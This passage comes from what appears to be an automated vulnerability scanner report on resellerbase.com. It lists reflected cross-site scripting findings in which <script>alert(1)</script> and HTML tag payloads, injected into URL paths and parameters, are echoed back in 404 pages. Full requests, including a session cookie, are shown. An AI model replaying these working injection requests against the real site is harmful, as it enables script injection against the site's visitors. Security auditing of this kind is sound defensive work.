Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/search.php?keyword=search...8a0e3<a>fbc7e5452a3&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1906. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 43023<script>alert(1)</script>4849a76c2bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&43023<script>alert(1)</script>4849a76c2bc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&43023<script>alert(1)</script>4849a76c2bc=1 was not found on this server.</p>
...[SNIP]...

2.1907. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 29fd9<a>f1fa84db1fe was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=229fd9<a>f1fa84db1fe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=229fd9<a>f1fa84db1fe was not found on this server.</p>
...[SNIP]...

2.1908. http://www.resellerbase.com/detail/23/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 441a5<script>alert(1)</script>bb50162bb4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail441a5<script>alert(1)</script>bb50162bb4e/23/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail441a5<script>alert(1)</script>bb50162bb4e/23/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1909. http://www.resellerbase.com/detail/23/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5741f<script>alert(1)</script>360f62bbc02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/235741f<script>alert(1)</script>360f62bbc02/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/235741f<script>alert(1)</script>360f62bbc02/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1910. http://www.resellerbase.com/detail/23/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1802a<script>alert(1)</script>227dd8d0303 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes1802a<script>alert(1)</script>227dd8d0303/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes1802a<script>alert(1)</script>227dd8d0303/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1911. http://www.resellerbase.com/detail/23/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f2f9d<script>alert(1)</script>07f307e4b68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/search.phpf2f9d<script>alert(1)</script>07f307e4b68?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/search.phpf2f9d<script>alert(1)</script>07f307e4b68?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1912. http://www.resellerbase.com/detail/23/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 339f5<a>15d5d7af93e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/search.php?keyword=search...&Submit3=Search339f5<a>15d5d7af93e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/search.php?keyword=search...&Submit3=Search339f5<a>15d5d7af93e&opt=2 was not found on this server.</p>
...[SNIP]...

2.1913. http://www.resellerbase.com/detail/23/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ed351<a>d6a224daaba was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/search.php?keyword=search...ed351<a>d6a224daaba&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/search.php?keyword=search...ed351<a>d6a224daaba&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1914. http://www.resellerbase.com/detail/23/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 946aa<script>alert(1)</script>0f3f6763a98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=2&946aa<script>alert(1)</script>0f3f6763a98=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=2&946aa<script>alert(1)</script>0f3f6763a98=1 was not found on this server.</p>
...[SNIP]...

2.1915. http://www.resellerbase.com/detail/23/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 1e748<a>9d13021953a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=21e748<a>9d13021953a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=21e748<a>9d13021953a was not found on this server.</p>
...[SNIP]...

2.1916. http://www.resellerbase.com/detail/24/concentric-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/24/concentric-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e17c2<script>alert(1)</script>32fffacfe25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile17c2<script>alert(1)</script>32fffacfe25/24/concentric-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile17c2<script>alert(1)</script>32fffacfe25/24/concentric-com.html was not found on this server.</p>
...[SNIP]...

2.1917. http://www.resellerbase.com/detail/24/concentric-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/24/concentric-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f61f8<script>alert(1)</script>510821a0b4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/24/f61f8<script>alert(1)</script>510821a0b4a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/24/f61f8<script>alert(1)</script>510821a0b4a was not found on this server.</p>
...[SNIP]...

2.1918. http://www.resellerbase.com/detail/25/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/25/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6ab9<script>alert(1)</script>a776e4c884e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf6ab9<script>alert(1)</script>a776e4c884e/25/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf6ab9<script>alert(1)</script>a776e4c884e/25/ was not found on this server.</p>
...[SNIP]...

2.1919. http://www.resellerbase.com/detail/25/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/25/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 93bf4<script>alert(1)</script>7e63dc10a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2593bf4<script>alert(1)</script>7e63dc10a1d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2593bf4<script>alert(1)</script>7e63dc10a1d/ was not found on this server.</p>
...[SNIP]...

2.1920. http://www.resellerbase.com/detail/25/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/25/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e1b67<script>alert(1)</script>b7f8a9d8154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/25/?e1b67<script>alert(1)</script>b7f8a9d8154=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/?e1b67<script>alert(1)</script>b7f8a9d8154=1 was not found on this server.</p>
...[SNIP]...

2.1921. http://www.resellerbase.com/detail/25/grouptravelplanet-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/25/grouptravelplanet-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 592b4<script>alert(1)</script>365a63a9a6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail592b4<script>alert(1)</script>365a63a9a6a/25/grouptravelplanet-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail592b4<script>alert(1)</script>365a63a9a6a/25/grouptravelplanet-com.html was not found on this server.</p>
...[SNIP]...

2.1922. http://www.resellerbase.com/detail/25/grouptravelplanet-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/25/grouptravelplanet-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a7c3<a>fb9df526a50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/254a7c3<a>fb9df526a50/grouptravelplanet-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/254a7c3<a>fb9df526a50/grouptravelplanet-com.html was not found on this server.</p>
...[SNIP]...

2.1923. http://www.resellerbase.com/detail/25/grouptravelplanet-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/25/grouptravelplanet-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 13bb9<script>alert(1)</script>cf59bd5fb18 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/25/13bb9<script>alert(1)</script>cf59bd5fb18 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/13bb9<script>alert(1)</script>cf59bd5fb18 was not found on this server.</p>
...[SNIP]...

2.1924. http://www.resellerbase.com/detail/25/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/25/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 64d8d<script>alert(1)</script>3ed570b4b3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail64d8d<script>alert(1)</script>3ed570b4b3f/25/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

